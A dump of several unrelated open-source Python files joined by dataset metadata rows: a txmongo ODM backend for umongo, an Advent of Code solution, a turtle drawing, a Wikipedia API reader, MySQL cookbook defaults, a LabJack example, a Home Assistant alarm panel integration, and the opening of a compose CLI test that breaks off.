                      args.delimiter, args.sep_out, args.output_location)
    except IOError as exc:
        warning("Problems reading file:", exc)
        return IO_ERROR
    except InvalidDataError as exc:
        warning("Problems reading data:", exc)
        return INVALID_DATA
    return GOOD_RET


if __name__ == '__main__':
    sys.exit(main())
| 45.457778 | 120 | 0.582812 |
700e9f5df1f7c929fc43faf1d9967c0d2a7e8de7 | 12,621 | py | Python | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | umongo/frameworks/txmongo.py | voglster/umongo | 8434288c49762ab1bf6289c8499ad5c419647b05 | [
"MIT"
] | null | null | null | from twisted.internet.defer import (
inlineCallbacks, Deferred, DeferredList, returnValue, maybeDeferred)
from txmongo import filter as qf
from txmongo.database import Database
from pymongo.errors import DuplicateKeyError
import marshmallow as ma
from ..builder import BaseBuilder
from ..instance import Instance
from ..document import DocumentImplementation
from ..data_objects import Reference
from ..exceptions import NotCreatedError, UpdateError, DeleteError, NoneReferenceError
from ..fields import ReferenceField, ListField, EmbeddedField
from ..query_mapper import map_query
from .tools import cook_find_filter
class TxMongoDocument(DocumentImplementation):
__slots__ = ()
opts = DocumentImplementation.opts
@inlineCallbacks
def reload(self):
"""
Retrieve and replace document's data by the ones in database.
Raises :class:`umongo.exceptions.NotCreatedError` if the document
doesn't exist in database.
"""
if not self.is_created:
raise NotCreatedError("Document doesn't exists in database")
ret = yield self.collection.find_one(self.pk)
if ret is None:
raise NotCreatedError("Document doesn't exists in database")
self._data = self.DataProxy()
self._data.from_mongo(ret)
@inlineCallbacks
def commit(self, io_validate_all=False, conditions=None, replace=False):
"""
Commit the document in database.
If the document doesn't already exist it will be inserted, otherwise
it will be updated.
:param io_validate_all:
:param conditions: only perform commit if matching record in db
satisfies condition(s) (e.g. version number).
Raises :class:`umongo.exceptions.UpdateError` if the
conditions are not satisfied.
:param replace: Replace the document rather than update.
:return: A :class:`pymongo.results.UpdateResult` or
:class:`pymongo.results.InsertOneResult` depending of the operation.
"""
try:
if self.is_created:
if self.is_modified() or replace:
query = conditions or {}
query['_id'] = self.pk
# pre_update can provide additional query filter and/or
# modify the fields' values
additional_filter = yield maybeDeferred(self.pre_update)
if additional_filter:
query.update(map_query(additional_filter, self.schema.fields))
self.required_validate()
yield self.io_validate(validate_all=io_validate_all)
if replace:
payload = self._data.to_mongo(update=False)
ret = yield self.collection.replace_one(query, payload)
else:
payload = self._data.to_mongo(update=True)
ret = yield self.collection.update_one(query, payload)
if ret.matched_count != 1:
raise UpdateError(ret)
yield maybeDeferred(self.post_update, ret)
else:
ret = None
elif conditions:
raise NotCreatedError(
'Document must already exist in database to use `conditions`.'
)
else:
yield maybeDeferred(self.pre_insert)
self.required_validate()
yield self.io_validate(validate_all=io_validate_all)
payload = self._data.to_mongo(update=False)
ret = yield self.collection.insert_one(payload)
# TODO: check ret ?
self._data.set(self.pk_field, ret.inserted_id)
self.is_created = True
yield maybeDeferred(self.post_insert, ret)
except DuplicateKeyError as exc:
# Sort value to make testing easier for compound indexes
keys = sorted(exc.details['keyPattern'].keys())
try:
fields = [self.schema.fields[k] for k in keys]
except KeyError:
# A key in the index is unknwon from umongo
raise exc
if len(keys) == 1:
msg = fields[0].error_messages['unique']
raise ma.ValidationError({keys[0]: msg})
raise ma.ValidationError({
k: f.error_messages['unique_compound'].format(fields=keys)
for k, f in zip(keys, fields)
})
self._data.clear_modified()
return ret
@inlineCallbacks
def delete(self, conditions=None):
"""
Remove the document from database.
:param conditions: Only perform delete if matching record in db
satisfies condition(s) (e.g. version number).
Raises :class:`umongo.exceptions.DeleteError` if the
conditions are not satisfied.
Raises :class:`umongo.exceptions.NotCreatedError` if the document
is not created (i.e. ``doc.is_created`` is False)
Raises :class:`umongo.exceptions.DeleteError` if the document
doesn't exist in database.
:return: A :class:`pymongo.results.DeleteResult`
"""
if not self.is_created:
raise NotCreatedError("Document doesn't exists in database")
query = conditions or {}
query['_id'] = self.pk
# pre_delete can provide additional query filter
additional_filter = yield maybeDeferred(self.pre_delete)
if additional_filter:
query.update(map_query(additional_filter, self.schema.fields))
ret = yield self.collection.delete_one(query)
if ret.deleted_count != 1:
raise DeleteError(ret)
self.is_created = False
yield maybeDeferred(self.post_delete, ret)
return ret
def io_validate(self, validate_all=False):
"""
Run the io_validators of the document's fields.
:param validate_all: If False only run the io_validators of the
fields that have been modified.
"""
if validate_all:
return _io_validate_data_proxy(self.schema, self._data)
return _io_validate_data_proxy(
self.schema, self._data, partial=self._data.get_modified_fields())
@classmethod
@inlineCallbacks
def find_one(cls, filter=None, *args, **kwargs):
"""
Find a single document in database.
"""
filter = cook_find_filter(cls, filter)
ret = yield cls.collection.find_one(filter, *args, **kwargs)
if ret is not None:
ret = cls.build_from_mongo(ret, use_cls=True)
return ret
@classmethod
@inlineCallbacks
def find(cls, filter=None, *args, **kwargs):
"""
Find a list document in database.
Returns a list of Documents.
"""
filter = cook_find_filter(cls, filter)
raw_cursor_or_list = yield cls.collection.find(filter, *args, **kwargs)
return [cls.build_from_mongo(e, use_cls=True) for e in raw_cursor_or_list]
    @classmethod
    @inlineCallbacks
    def find_with_cursor(cls, filter=None, *args, **kwargs):
        """
        Find a list document in database.

        Returns a cursor that provides Documents: each result is a
        ``(documents, deferred_cursor)`` pair where the deferred fires
        with the next batch in the same wrapped form.
        """
        filter = cook_find_filter(cls, filter)
        raw_cursor_or_list = yield cls.collection.find_with_cursor(filter, *args, **kwargs)
        def wrap_raw_results(result):
            # result[0] is the current batch of raw dicts, result[1] the
            # deferred for the next batch (or None at the end). Chain this
            # same wrapper so every future batch is also Document-wrapped.
            cursor = result[1]
            if cursor is not None:
                cursor.addCallback(wrap_raw_results)
            return ([cls.build_from_mongo(e, use_cls=True) for e in result[0]], cursor)
        return wrap_raw_results(raw_cursor_or_list)
    @classmethod
    def count(cls, filter=None, **kwargs):
        """
        Get the number of documents in this collection.

        :return: the Deferred returned by the underlying collection count.
        """
        filter = cook_find_filter(cls, filter)
        return cls.collection.count(filter=filter, **kwargs)
    @classmethod
    @inlineCallbacks
    def ensure_indexes(cls):
        """
        Check&create if needed the Document's indexes in database
        """
        for index in cls.opts.indexes:
            # index.document holds the mongo index document; 'key' is the
            # field->direction mapping, the rest are create_index options.
            kwargs = index.document.copy()
            keys = kwargs.pop('key')
            # qf.sort builds the txmongo sort/index specification from the
            # (field, direction) pairs — TODO confirm qf is txmongo.filter.
            index = qf.sort(keys.items())
            yield cls.collection.create_index(index, **kwargs)
def _errback_factory(errors, field=None):
    """Build a twisted errback that records marshmallow validation errors.

    Validation errors are appended to ``errors`` (or stored under
    ``errors[field]`` when a field key is given); any other exception is
    re-raised unchanged.
    """
    def errback(failure):
        exc = failure.value
        if not isinstance(exc, ma.ValidationError):
            raise exc
        if field is None:
            errors.extend(exc.messages)
        else:
            errors[field] = exc.messages
    return errback
# Run multiple validators and collect all errors in one
@inlineCallbacks
def _run_validators(validators, field, value):
    """Run every io_validator of *field* on *value*, gathering all errors."""
    errors = []
    defers = []
    for validator in validators:
        try:
            defer = validator(field, value)
        except ma.ValidationError as exc:
            # Synchronous failure: record immediately.
            errors.extend(exc.messages)
        else:
            assert isinstance(defer, Deferred), 'io_validate functions must return a Deferred'
            # Asynchronous failure: collected later through the errback.
            defer.addErrback(_errback_factory(errors))
            defers.append(defer)
    # Wait for every pending validator before deciding the outcome.
    yield DeferredList(defers)
    if errors:
        raise ma.ValidationError(errors)
@inlineCallbacks
def _io_validate_data_proxy(schema, data_proxy, partial=None):
    """Run io-validation over the fields of a document's data proxy.

    :param partial: optional collection of field names; when given, only
        those fields are validated.
    :raises ma.ValidationError: mapping field name -> messages if any
        field failed validation.
    """
    errors = {}
    defers = []
    for name, field in schema.fields.items():
        if partial and name not in partial:
            continue
        value = data_proxy.get(name)
        # Missing values have nothing to validate.
        if value is ma.missing:
            continue
        try:
            # Recursive validation (lists / embedded documents) runs first
            # and synchronously blocks this field's own validators.
            if field.io_validate_recursive:
                yield field.io_validate_recursive(field, value)
            if field.io_validate:
                defer = _run_validators(field.io_validate, field, value)
                defer.addErrback(_errback_factory(errors, name))
                defers.append(defer)
        except ma.ValidationError as exc:
            errors[name] = exc.messages
    yield DeferredList(defers)
    if errors:
        raise ma.ValidationError(errors)
def _reference_io_validate(field, value):
return value.fetch(no_data=True)
@inlineCallbacks
def _list_io_validate(field, value):
    """Run the inner field's io_validators on every element of a list field.

    :raises ma.ValidationError: mapping element index -> messages.
    """
    validators = field.inner.io_validate
    if not validators or not value:
        return
    errors = {}
    defers = []
    for idx, exc in enumerate(value):
        defer = _run_validators(validators, field.inner, exc)
        # Errors are keyed by the element's position in the list.
        defer.addErrback(_errback_factory(errors, idx))
        defers.append(defer)
    yield DeferredList(defers)
    if errors:
        raise ma.ValidationError(errors)
def _embedded_document_io_validate(field, value):
    """Recursively io-validate an embedded document's own fields."""
    return _io_validate_data_proxy(value.schema, value._data)
class TxMongoReference(Reference):
    """Reference implementation for txmongo, caching the fetched document."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Cached document; populated on first fetch.
        self._document = None
    @inlineCallbacks
    def fetch(self, no_data=False, force_reload=False):
        """Retrieve (and cache) the referenced document.

        NOTE(review): ``no_data`` is accepted for API compatibility but the
        full document is fetched regardless.
        :raises NoneReferenceError: if the reference has no primary key.
        :raises ma.ValidationError: if the referenced document is missing.
        """
        if not self._document or force_reload:
            if self.pk is None:
                raise NoneReferenceError('Cannot retrieve a None Reference')
            self._document = yield self.document_cls.find_one(self.pk)
            if not self._document:
                raise ma.ValidationError(self.error_messages['not_found'].format(
                    document=self.document_cls.__name__))
        returnValue(self._document)
class TxMongoBuilder(BaseBuilder):
    """Builder wiring umongo documents/fields to the txmongo driver."""
    BASE_DOCUMENT_CLS = TxMongoDocument
    def _patch_field(self, field):
        """Normalize a field's io_validate hooks and attach txmongo helpers."""
        super()._patch_field(field)
        validators = field.io_validate
        # Normalize io_validate to always be a mutable list of callables.
        if not validators:
            field.io_validate = []
        else:
            if hasattr(validators, '__iter__'):
                validators = list(validators)
            else:
                validators = [validators]
            field.io_validate = validators
        # Container/embedded fields validate recursively into their contents.
        if isinstance(field, ListField):
            field.io_validate_recursive = _list_io_validate
        # References additionally check existence and use the txmongo
        # Reference class for lazy fetching.
        if isinstance(field, ReferenceField):
            field.io_validate.append(_reference_io_validate)
            field.reference_cls = TxMongoReference
        if isinstance(field, EmbeddedField):
            field.io_validate_recursive = _embedded_document_io_validate
class TxMongoInstance(Instance):
    """
    :class:`umongo.instance.Instance` implementation for txmongo
    """
    BUILDER_CLS = TxMongoBuilder
    @staticmethod
    def is_compatible_with(db):
        # Accept only txmongo Database handles.
        return isinstance(db, Database)
| 35.855114 | 94 | 0.621742 |
88bafff1e0a32fd7cbaef256c6f2c1b43243e73c | 1,212 | py | Python | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | 11 | 2017-12-19T09:54:43.000Z | 2022-01-27T22:31:11.000Z | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | null | null | null | 2015/day-17/solution.py | bertptrs/adventofcode | 09b590e9276cb9bdb17d47ad73d1df24fa0093dc | [
"MIT"
] | 1 | 2020-12-02T09:23:46.000Z | 2020-12-02T09:23:46.000Z | from __future__ import print_function, division
import fileinput
from collections import defaultdict
import bisect
def value(buckets, choice):
    """Sum the bucket sizes selected by the bitmask ``choice``.

    Bit ``i`` of ``choice`` selects ``buckets[i]``.
    """
    return sum(size for bit, size in enumerate(buckets) if (choice >> bit) & 1)
def ones(x):
    """Return the population count (number of set bits) of ``x``.

    Uses ``bin(x).count("1")`` instead of a manual divide-by-two loop.
    Non-positive inputs return 0, matching the original loop's behavior.
    """
    return bin(x).count("1") if x > 0 else 0
def partition(a_list):
    """Split ``a_list`` into two halves at the midpoint (left half shorter
    for odd lengths)."""
    mid = len(a_list) // 2
    left, right = a_list[:mid], a_list[mid:]
    return left, right
def partitionList(buckets):
    """Enumerate every subset of ``buckets`` as a sorted list of
    ``(subset_sum, subset_size)`` pairs."""
    pairs = ((value(buckets, mask), ones(mask)) for mask in range(1 << len(buckets)))
    return sorted(pairs)
# --- Meet-in-the-middle subset-sum over the container sizes ---
buckets = []
for line in fileinput.input():
    buckets.append(int(line))
# Split the containers into two halves so subsets can be enumerated
# independently: 2 * 2**(n/2) combinations instead of 2**n.
partition1, partition2 = partition(buckets)
values1 = partitionList(partition1)
values2 = partitionList(partition2)
# possible[k] = number of ways to hit the target using exactly k containers
possible = defaultdict(lambda: 0)
i = 0
target = 150
for entry in values1:
    # values2 is sorted by (sum, count): binary-search the complementary sum.
    i = bisect.bisect_left(values2, (target - entry[0], 0))
    while i < len(values2) and entry[0] + values2[i][0] == target:
        possible[entry[1] + values2[i][1]] += 1
        i += 1
print("Total possibilities:", sum(possible.values()))
print("Minimal possibilities:", possible[min(possible.keys())])
| 19.238095 | 77 | 0.626238 |
0ef16605213908aae3b64d6fef5fc82ba0dd7d70 | 261 | py | Python | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | 5 | 2018-06-04T16:11:56.000Z | 2021-02-25T21:59:58.000Z | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | null | null | null | docs/CS161/Star.py | DavidJLu/CCUT | 755cdeaa36f4eac817d09efe29550843fa5a4fdc | [
"MIT"
] | 1 | 2019-02-21T21:22:55.000Z | 2019-02-21T21:22:55.000Z | #Star.py
#David Lu
import turtle
t = turtle.Turtle()
turtle.bgcolor('white')
t.color('green')
t.width(5)
# Turning 144 degrees after each equal-length segment closes the path every
# 5 segments, so 50 segments retrace a five-pointed star 10 times.
for i in range(50):
    t.forward(150)
    t.right(144) # What kind of shape is drawn if we turn right 144 degrees?
turtle.exitonclick()
| 17.4 | 78 | 0.64751 |
603827f16ea000708af6b33ab0dddb552c3131cb | 7,238 | py | Python | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | null | null | null | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | 1 | 2021-03-31T19:48:39.000Z | 2021-03-31T19:48:39.000Z | api_connector.py | DevopediaOrg/wikipedia-reader | c90eb5431b36449afe493df650284fc18a526616 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
import json
import re
import sys
import mwclient
class ApiConnector:
    ''' Call an API to request an article.
    '''
    def __init__(self, **kwargs):
        '''Store configuration, fill in defaults and open the mwclient site.

        Expected kwargs: endpoint (required), func, parse, query.
        Exits the process (sys.exit) on invalid configuration.
        '''
        self.config = kwargs
        if 'endpoint' not in self.config or not self.config['endpoint']:
            sys.exit("ERR: API endpoint is missing in configuration. Quitting...")
        # Put defaults for some missing configurations
        self.func = self.get_parsed_text
        if 'func' in self.config:
            if getattr(self, self.config['func'], None) is None:
                sys.exit("ERR: API function '{}' is missing. Use one of {}. Quitting...".format(
                    self.config['func'], '(get_text, get_parsed_text, get_info)'))
            else:
                self.func = getattr(self, self.config['func'])
        if 'parse' not in self.config or not self.config['parse']:
            self.config['parse'] = 'categories|displaytitle|links|revid|sections|templates|text|wikitext'
        if 'query' not in self.config or not self.config['query']:
            self.config['query'] = {
                'categories': {
                    'clprop': 'timestamp',
                    'cllimit': 100
                },
                'extracts': { # excludes transcluded content
                    'explaintext': 1,
                    'exsectionformat' : 'wiki'
                },
                'info': {
                    'inprop': 'displaytitle|varianttitles'
                },
                'pageviews': {},
                'redirects': {
                    'rdprop': 'title',
                    'rdlimit': 500
                },
                'revisions': {}, # can't configure for multiple titles
                'templates': {
                    'tllimit': 500
                },
                'transcludedin': {
                    'tiprop': 'title|redirect',
                    'tilimit': 500
                }
            }
        self.site = mwclient.Site(self.config['endpoint'])
        self.start_date = (datetime.now() - timedelta(days=365)).strftime('%Y-%m-%d')+'T00:00:00Z'
    def get_text(self, title):
        ''' Give an article title, return the full text in Wikitext format.
            The text contains unexpanded transcluded content.
            This method makes a single API call.
        '''
        content = self.site.pages[title]
        # Wikitext format: mwclient uses action=query?prop=revisions&rvprop=content|timestamp&rvlimit=1
        text = content.text()
        # These will each make a separate API call: not ideal way to use mwclient
        # content.categories(), content.embeddedin(), content.links(),
        # content.revisions(), content.templates()
        return {
            'title': title,
            'text': text
        }
    def get_parsed_text(self, title):
        ''' Given an article title, return full text in Wikitext and HTML formats.
            Other relevant information are also returned from parsing the article's text.
            HTML text contains expanded transcluded content but categories in the footer are
            excluded. Wikitext contains all unexpanded transcluded content.
            This method makes a single API call.
        '''
        # Remove targets (section names separated by |) for request but track them for later use
        targets = re.findall(r'#(.*)', title)
        if targets:
            targets = targets[0].split('|')
            # BUGFIX: actually strip the '#...' fragment before calling the
            # API — page titles must not contain the section fragment.
            title = title.split('#', 1)[0]
        try:
            content = self.site.get('parse', page=title, prop=self.config['parse'], redirects=1)
            if 'warnings' in content:
                print("WARN: Some warnings in the API response: {}".format(content['warnings']))
        except mwclient.errors.APIError:
            # one reason is that the page doesn't exist
            return {
                'title': title,
                'text': ''
            }
        # Post-processing: expose HTML under 'html' and wikitext under 'text'.
        content['parse']['html'] = content['parse']['text']['*']
        content['parse']['text'] = content['parse']['wikitext']['*']
        del(content['parse']['wikitext'])
        if targets:
            content['parse']['targets'] = targets
        if 'redirects' in content['parse'] and not content['parse']['redirects']:
            del(content['parse']['redirects'])
        return content['parse']
    def get_info(self, titles):
        ''' Given one or more article titles, return essential information.
            All articles queried with a single API call. However, since there might be lot
            of data to retrieve, the response is often paginated, resulting in multiple calls.
            Only an extract of the article text is returned, if requested.
        '''
        childprops = {}
        for k, v in self.config['query'].items():
            childprops.update(v)
        if isinstance(titles, list): # else: called for a single title
            titles = "|".join(titles)
        props = "|".join(self.config['query'].keys())
        continues = {}
        # Call multiple times if response is paginated
        all_content = []
        num_calls = 0
        while True:
            num_calls += 1
            content = self.site.get('query', titles=titles, prop=props, redirects=1, **childprops, **continues)
            all_content.append(content)
            if 'continue' in content:
                continues = content['continue']
            else:
                break
        # Post-process the response to only what we need
        cum_content = {}
        for content in all_content:
            pages = content['query']['pages']
            for pgid, pg in pages.items():
                #if int(pgid) < 0 and 'missing' in pg:
                #    # page doesn't exist
                #    continue
                if pgid not in cum_content:
                    cum_content[pgid] = {}
                for k, v in pg.items():
                    # lists: concatenated across paginated responses
                    if k in ('categories', 'redirects','templates', 'transcludedin'):
                        if k not in cum_content[pgid]:
                            cum_content[pgid][k] = []
                        if k == 'templates':
                            pg[k] = [t for t in v if t['ns'] == 0]
                        cum_content[pgid][k].extend(pg[k])
                    # lengths: reduced to counts/sums
                    elif k in ('contributors', 'pageviews'):
                        if k not in cum_content[pgid]:
                            cum_content[pgid][k] = 0
                        if k == 'contributors':
                            cum_content[pgid][k] += len(v)
                        else:
                            cum_content[pgid][k] += sum(count for dt, count in v.items() if count is not None)
                    elif k == 'extract':
                        # empty for category pages
                        # extract may not be full text, is devoid of links and other useful stuff
                        cum_content[pgid]['text'] = v
                    # others
                    else:
                        cum_content[pgid][k] = v
        # Ignore the page ID keys since these are available in the values
        cum_content = [v for k, v in cum_content.items()]
        return cum_content
| 39.551913 | 111 | 0.520171 |
f3e59bd1574f8eb9faa01ee678f803ddd8ac381f | 1,717 | py | Python | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | 11 | 2015-01-14T00:43:26.000Z | 2020-12-29T06:12:51.000Z | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | null | null | null | kokki/cookbooks/mysql/metadata.py | samuel/kokki | da98da55e0bba8db5bda993666a43c6fdc4cacdb | [
"BSD-3-Clause"
] | 3 | 2015-01-14T01:05:56.000Z | 2019-01-26T05:09:37.000Z |
__config__ = {
    # --- Credentials ---
    "mysql.server_root_password": dict(
        default = "changeme",
    ),
    "mysql.server_repl_password": dict(
        default = None,
    ),
    "mysql.server_debian_password": dict(
        default = "changeme",
    ),
    # Grants applied at setup time.
    "mysql.grants": dict(
        default = [
            # dict(user, host, database, password, permissions)
        ],
    ),
    # --- Server basics ---
    "mysql.datadir": dict(
        description = "Location of MySQL database",
        default = "/var/lib/mysql",
    ),
    "mysql.bind_address": dict(
        description = "Address that MySQLd should listen on",
        default = "127.0.0.1",
    ),
    "mysql.ft_min_word_len": dict(
        description = "Minimum word length for items in the full-text index",
        default = None,
    ),
    # --- Performance tunables ---
    "mysql.tunable.key_buffer": dict(
        default = "250M",
    ),
    "mysql.tunable.max_connections": dict(
        default = 800,
    ),
    "mysql.tunable.wait_timeout": dict(
        default = 180,
    ),
    "mysql.tunable.net_read_timeout": dict(
        default = 30,
    ),
    "mysql.tunable.net_write_timeout": dict(
        default = 30,
    ),
    "mysql.tunable.back_log": dict(
        default = 128,
    ),
    "mysql.tunable.table_cache": dict(
        default = 128,
    ),
    "mysql.tunable.max_heap_table_size": dict(
        default = "32M",
    ),
    "mysql.tunable.thread_stack": dict(
        default = "128K"
    ),
    # Replication
    "mysql.server_id": dict(
        default = None,
    ),
    "mysql.log_bin": dict(
        default = None, # /var/log/mysql/mysql-bin.log
    ),
    "mysql.expire_logs_days": dict(
        default = 10,
    ),
    "mysql.max_binlog_size": dict(
        default = "100M",
    ),
}
1fac4d16b543da618295ee419de36d9e53d115ba | 1,779 | py | Python | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | null | null | null | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | null | null | null | Examples/Basic/eNames.py | iconservo/labjack-ljm | f22a47a80c628dcb133b74e6317e1e5617709b19 | [
"MIT"
] | 1 | 2019-04-11T06:46:14.000Z | 2019-04-11T06:46:14.000Z | """
Demonstrates how to use the labjack.ljm.eNames (LJM_eNames) function.
"""
from labjack import ljm
# Open first found LabJack
handle = ljm.openS("ANY", "ANY", "ANY")  # Any device, Any connection, Any identifier
#handle = ljm.openS("T7", "ANY", "ANY")  # T7 device, Any connection, Any identifier
#handle = ljm.openS("T4", "ANY", "ANY")  # T4 device, Any connection, Any identifier
#handle = ljm.open(ljm.constants.dtANY, ljm.constants.ctANY, "ANY")  # Any device, Any connection, Any identifier
info = ljm.getHandleInfo(handle)
print("Opened a LabJack with Device type: %i, Connection type: %i,\n"
      "Serial number: %i, IP address: %s, Port: %i,\nMax bytes per MB: %i" %
      (info[0], info[1], info[2], ljm.numberToIP(info[3]), info[4], info[5]))
# Local constants to save screen space
WRITE = ljm.constants.WRITE
READ = ljm.constants.READ
FLOAT32 = ljm.constants.FLOAT32
UINT16 = ljm.constants.UINT16
UINT32 = ljm.constants.UINT32
# Setup and call eNames to write/read values to/from the LabJack.
# Write 2.5V to DAC0,
# write 12345 to TEST_UINT16,
# read TEST_UINT16,
# read serial number,
# read product ID,
# and read firmware version.
numFrames = 6
aNames = ['DAC0', 'TEST_UINT16', 'TEST_UINT16', 'SERIAL_NUMBER', 'PRODUCT_ID',
          'FIRMWARE_VERSION']
aWrites = [WRITE, WRITE, READ, READ, READ, READ]
aNumValues = [1, 1, 1, 1, 1, 1]
aValues = [2.5, 12345, 0, 0, 0, 0]
results = ljm.eNames(handle, numFrames, aNames, aWrites, aNumValues, aValues)
print("\neNames results: ")
# Frames can return multiple values, so walk results with a running offset.
start = 0
for i in range(numFrames):
    end = start + aNumValues[i]
    print("    Name - %16s, write - %i, values %s" %
          (aNames[i], aWrites[i], results[start:end]))
    start = end
# Close handle
ljm.close(handle)
| 34.882353 | 114 | 0.661608 |
0bdcf274c0874db6db3c6773d205c3f1659f74c8 | 4,041 | py | Python | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 13 | 2017-02-01T13:25:34.000Z | 2022-01-26T01:30:39.000Z | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 9 | 2017-07-26T18:05:32.000Z | 2021-12-05T14:16:34.000Z | homeassistant/components/alarm_control_panel/concord232.py | mbs-technologie/home-assistant | 71fc446425cbb1c0d4670c261ce8ea3bfd83a73d | [
"MIT"
] | 21 | 2017-07-26T17:09:40.000Z | 2022-03-27T22:37:22.000Z | """
Support for Concord232 alarm control panels.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/alarm_control_panel.concord232/
"""
import datetime
import logging
import requests
import voluptuous as vol
import homeassistant.components.alarm_control_panel as alarm
from homeassistant.components.alarm_control_panel import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME, STATE_ALARM_DISARMED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['concord232==0.14']
_LOGGER = logging.getLogger(__name__)
# Connection defaults for the concord232 proxy server.
DEFAULT_HOST = 'localhost'
DEFAULT_NAME = 'CONCORD232'
DEFAULT_PORT = 5007
# Polling interval — assumed seconds; TODO confirm against platform docs.
SCAN_INTERVAL = 1
# Platform schema: proxy host/port plus a friendly entity name.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
})
def setup_platform(hass, config, discovery_info=None):
    """Set up the Concord232 alarm control panel platform."""
    name = config.get(CONF_NAME)
    host = config.get(CONF_HOST)
    port = config.get(CONF_PORT)
    url = 'http://{}:{}'.format(host, port)
    try:
        add_devices([Concord232Alarm(hass, url, name)])
    except requests.exceptions.ConnectionError as ex:
        # Report setup failure when the concord232 proxy is unreachable.
        _LOGGER.error("Unable to connect to Concord232: %s", str(ex))
        return False
class Concord232Alarm(alarm.AlarmControlPanel):
    """Represents the Concord232-based alarm panel."""
    def __init__(self, hass, url, name):
        """Initialize the Concord232 alarm panel.

        Raises requests.exceptions.ConnectionError when the concord232
        proxy at ``url`` is unreachable so setup_platform can handle it.
        """
        from concord232 import client as concord232_client
        self._state = STATE_UNKNOWN
        self._hass = hass
        self._name = name
        self._url = url
        try:
            client = concord232_client.Client(self._url)
        except requests.exceptions.ConnectionError as ex:
            _LOGGER.error("Unable to connect to Concord232: %s", str(ex))
            # BUGFIX: re-raise instead of falling through — 'client' would be
            # unbound below and raise a confusing NameError.
            raise
        self._alarm = client
        self._alarm.partitions = self._alarm.list_partitions()
        self._alarm.last_partition_update = datetime.datetime.now()
        self.update()
    @property
    def should_poll(self):
        """Polling needed."""
        return True
    @property
    def name(self):
        """Return the name of the device."""
        return self._name
    @property
    def code_format(self):
        """Regex describing the accepted code format (4 or 6 digits)."""
        return '[0-9]{4}([0-9]{2})?'
    @property
    def state(self):
        """Return the state of the device."""
        return self._state
    def update(self):
        """Update values from API."""
        try:
            part = self._alarm.list_partitions()[0]
        except requests.exceptions.ConnectionError as ex:
            _LOGGER.error("Unable to connect to %(host)s: %(reason)s",
                          dict(host=self._url, reason=ex))
            # BUGFIX: return early — 'part' is unbound, so falling through
            # used to raise NameError. Report the state as unknown instead.
            self._state = STATE_UNKNOWN
            return self._state
        except IndexError:
            _LOGGER.error("Concord232 reports no partitions")
            self._state = STATE_UNKNOWN
            return self._state
        if part['arming_level'] == 'Off':
            newstate = STATE_ALARM_DISARMED
        elif 'Home' in part['arming_level']:
            newstate = STATE_ALARM_ARMED_HOME
        else:
            newstate = STATE_ALARM_ARMED_AWAY
        if newstate != self._state:
            _LOGGER.info("State change from %s to %s", self._state, newstate)
            self._state = newstate
        return self._state
    def alarm_disarm(self, code=None):
        """Send disarm command."""
        self._alarm.disarm(code)
    def alarm_arm_home(self, code=None):
        """Send arm home command."""
        self._alarm.arm('home')
    def alarm_arm_away(self, code=None):
        """Send arm away command."""
        self._alarm.arm('auto')
    def alarm_trigger(self, code=None):
        """Alarm trigger command (not supported by this platform)."""
        raise NotImplementedError()
| 30.383459 | 77 | 0.657511 |
df3eec66d080f455241dcee22f5366f6e569a9b8 | 18,477 | py | Python | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | null | null | null | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | 1 | 2021-03-26T00:41:22.000Z | 2021-03-26T00:41:22.000Z | tests/integration/cli_test.py | btaitelb/compose | 43369cda9ce5f0fe4860c7160cfa6550d31e2417 | [
"Apache-2.0"
] | 1 | 2020-04-13T17:43:26.000Z | 2020-04-13T17:43:26.000Z | from __future__ import absolute_import
import sys
import os
from six import StringIO
from mock import patch
from .testcases import DockerClientTestCase
from compose.cli.main import TopLevelCommand
class CLITestCase(DockerClientTestCase):
    def setUp(self):
        """Stub out sys.exit (the CLI calls it on errors) and build a
        TopLevelCommand pointed at the simple fixture project."""
        super(CLITestCase, self).setUp()
        self.old_sys_exit = sys.exit
        sys.exit = lambda code=0: None
